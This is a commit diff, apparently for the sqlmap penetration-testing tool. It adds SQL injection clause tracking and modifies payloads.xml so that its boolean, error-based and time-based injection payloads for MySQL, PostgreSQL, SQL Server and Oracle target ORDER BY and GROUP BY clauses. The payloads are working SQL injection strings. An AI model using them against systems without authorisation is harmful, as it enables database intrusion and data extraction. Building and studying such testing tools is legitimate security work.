Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 4dec049

Browse files
bdamelebdamele
committed
Major bug fix for test on ORDER BY and GROUP BY clauses.
Minor bug fix to skip following tests if they do not match any of the clause previously identified (injection.clause value).
1 parent 827a0ae commit 4dec049

3 files changed

Lines changed: 49 additions & 50 deletions

File tree

lib/controller/checks.py

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value):
9494
for test in conf.tests:
9595
title = test.title
9696
stype = test.stype
97+
clause = test.clause
9798

9899
# Skip test if the risk is higher than the provided (or default)
99100
# value
@@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value):
145146
logger.debug(debugMsg)
146147
continue
147148

149+
# Skip test if it does not match the same SQL injection clause
150+
# already identified by another test
151+
# Parse test's <clause>
152+
clauseMatch = False
153+
154+
for clauseTest in clause:
155+
if injection.clause is not None and clauseTest in injection.clause:
156+
clauseMatch = True
157+
break
158+
159+
if clause != [ 0 ] and injection.clause and not clauseMatch:
160+
debugMsg = "skipping test '%s' because the clause " % title
161+
debugMsg += "differs from the clause already identified"
162+
logger.debug(debugMsg)
163+
continue
164+
148165
infoMsg = "testing '%s'" % title
149166
logger.info(infoMsg)
150167

@@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value):
340357
injection.ptype = ptype
341358
injection.prefix = prefix
342359
injection.suffix = suffix
360+
injection.clause = clause
343361

344362
if "epayload" in test:
345363
epayload = "%s%s" % (test.epayload, comment)

lib/core/datatype.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -70,6 +70,7 @@ def injectionDict():
7070
injection.ptype = None
7171
injection.prefix = None
7272
injection.suffix = None
73+
injection.clause = None
7374

7475
# data is a dict with stype as key and a tuple as value with
7576
# title, where, comment and reqPayload

xml/payloads.xml

Lines changed: 30 additions & 50 deletions
Original file line numberDiff line numberDiff line change
@@ -393,16 +393,6 @@ Formats:
393393
</boundary>
394394
<!-- End of WHERE clause boundaries -->
395395

396-
<!-- GROUP BY and ORDER BY clauses boundaries -->
397-
<boundary>
398-
<level>2</level>
399-
<clause>2,3</clause>
400-
<where>1,2</where>
401-
<ptype>1</ptype>
402-
<prefix>,</prefix>
403-
<suffix></suffix>
404-
</boundary>
405-
<!-- End of GROUP BY and ORDER BY clauses boundaries -->
406396

407397
<!-- Login forms to use with OR-based tests boundaries -->
408398
<boundary>
@@ -604,16 +594,6 @@ Formats:
604594
<suffix></suffix>
605595
<comment>--</comment>
606596
</boundary>
607-
608-
<boundary>
609-
<level>2</level>
610-
<clause>2,3</clause>
611-
<where>1,2</where>
612-
<ptype>1</ptype>
613-
<prefix>,</prefix>
614-
<suffix></suffix>
615-
<comment>--</comment>
616-
</boundary>
617597
<!-- End of login forms to use with OR-based tests boundaries -->
618598

619599

@@ -662,10 +642,10 @@ Formats:
662642
<where>1</where>
663643
<epayload></epayload>
664644
<request>
665-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
645+
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
666646
</request>
667647
<response>
668-
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
648+
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
669649
</response>
670650
<details>
671651
<dbms>MySQL</dbms>
@@ -682,10 +662,10 @@ Formats:
682662
<where>1</where>
683663
<epayload></epayload>
684664
<request>
685-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
665+
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
686666
</request>
687667
<response>
688-
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
668+
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
689669
</response>
690670
<details>
691671
<dbms>MySQL</dbms>
@@ -701,10 +681,10 @@ Formats:
701681
<where>1</where>
702682
<epayload></epayload>
703683
<request>
704-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
684+
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
705685
</request>
706686
<response>
707-
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
687+
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
708688
</response>
709689
<details>
710690
<dbms>Microsoft SQL Server</dbms>
@@ -720,10 +700,10 @@ Formats:
720700
<where>1</where>
721701
<epayload></epayload>
722702
<request>
723-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
703+
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
724704
</request>
725705
<response>
726-
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
706+
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
727707
</response>
728708
<details>
729709
<dbms>Oracle</dbms>
@@ -741,10 +721,10 @@ Formats:
741721
<where>1</where>
742722
<epayload></epayload>
743723
<request>
744-
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
724+
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
745725
</request>
746726
<response>
747-
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
727+
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
748728
</response>
749729
</test>
750730

@@ -1046,15 +1026,15 @@ Formats:
10461026

10471027
<!-- Error-based tests - GROUP BY and ORDER BY clauses -->
10481028
<test>
1049-
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
1029+
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (append)</title>
10501030
<stype>2</stype>
10511031
<level>3</level>
10521032
<risk>0</risk>
10531033
<clause>2,3</clause>
10541034
<where>1</where>
1055-
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
1035+
<epayload>, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
10561036
<request>
1057-
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
1037+
<payload>, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
10581038
</request>
10591039
<response>
10601040
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1066,15 +1046,15 @@ Formats:
10661046
</test>
10671047

10681048
<test>
1069-
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
1049+
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (append)</title>
10701050
<stype>2</stype>
10711051
<level>3</level>
10721052
<risk>0</risk>
10731053
<clause>2,3</clause>
10741054
<where>1</where>
1075-
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
1055+
<epayload>, (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
10761056
<request>
1077-
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
1057+
<payload>, (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
10781058
</request>
10791059
<response>
10801060
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1085,15 +1065,15 @@ Formats:
10851065
</test>
10861066

10871067
<test>
1088-
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
1068+
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (append)</title>
10891069
<stype>2</stype>
10901070
<level>3</level>
10911071
<risk>0</risk>
10921072
<clause>3</clause>
10931073
<where>1</where>
1094-
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
1074+
<epayload>, (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
10951075
<request>
1096-
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
1076+
<payload>, (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
10971077
</request>
10981078
<response>
10991079
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1104,15 +1084,15 @@ Formats:
11041084
</test>
11051085

11061086
<test>
1107-
<title>Oracle error-based - ORDER BY clause</title>
1087+
<title>Oracle error-based - ORDER BY clause (append)</title>
11081088
<stype>2</stype>
11091089
<level>3</level>
11101090
<risk>0</risk>
11111091
<clause>3</clause>
11121092
<where>1</where>
1113-
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
1093+
<epayload>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
11141094
<request>
1115-
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
1095+
<payload>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
11161096
</request>
11171097
<response>
11181098
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1123,7 +1103,7 @@ Formats:
11231103
</test>
11241104

11251105
<test>
1126-
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
1106+
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (replace)</title>
11271107
<stype>2</stype>
11281108
<level>4</level>
11291109
<risk>0</risk>
@@ -1143,7 +1123,7 @@ Formats:
11431123
</test>
11441124

11451125
<test>
1146-
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
1126+
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace)</title>
11471127
<stype>2</stype>
11481128
<level>4</level>
11491129
<risk>0</risk>
@@ -1162,7 +1142,7 @@ Formats:
11621142
</test>
11631143

11641144
<test>
1165-
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
1145+
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace)</title>
11661146
<stype>2</stype>
11671147
<level>4</level>
11681148
<risk>0</risk>
@@ -1181,7 +1161,7 @@ Formats:
11811161
</test>
11821162

11831163
<test>
1184-
<title>Oracle error-based - ORDER BY clause</title>
1164+
<title>Oracle error-based - ORDER BY clause (replace)</title>
11851165
<stype>2</stype>
11861166
<level>4</level>
11871167
<risk>0</risk>
@@ -1437,7 +1417,7 @@ Formats:
14371417
<stype>5</stype>
14381418
<level>1</level>
14391419
<risk>1</risk>
1440-
<clause>1</clause>
1420+
<clause>1,2,3</clause>
14411421
<where>1</where>
14421422
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
14431423
<request>
@@ -1457,7 +1437,7 @@ Formats:
14571437
<stype>5</stype>
14581438
<level>2</level>
14591439
<risk>1</risk>
1460-
<clause>1</clause>
1440+
<clause>1,2,3</clause>
14611441
<where>1</where>
14621442
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
14631443
<request>
@@ -1525,7 +1505,7 @@ Formats:
15251505
<stype>5</stype>
15261506
<level>2</level>
15271507
<risk>3</risk>
1528-
<clause>1</clause>
1508+
<clause>1,2,3</clause>
15291509
<where>1</where>
15301510
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
15311511
<request>
@@ -1545,7 +1525,7 @@ Formats:
15451525
<stype>5</stype>
15461526
<level>3</level>
15471527
<risk>3</risk>
1548-
<clause>1</clause>
1528+
<clause>1,2,3</clause>
15491529
<where>1</where>
15501530
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
15511531
<request>

0 commit comments

Comments
 (0)